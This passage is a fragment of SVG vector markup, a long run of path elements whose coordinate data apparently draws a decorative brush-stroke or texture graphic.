8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n 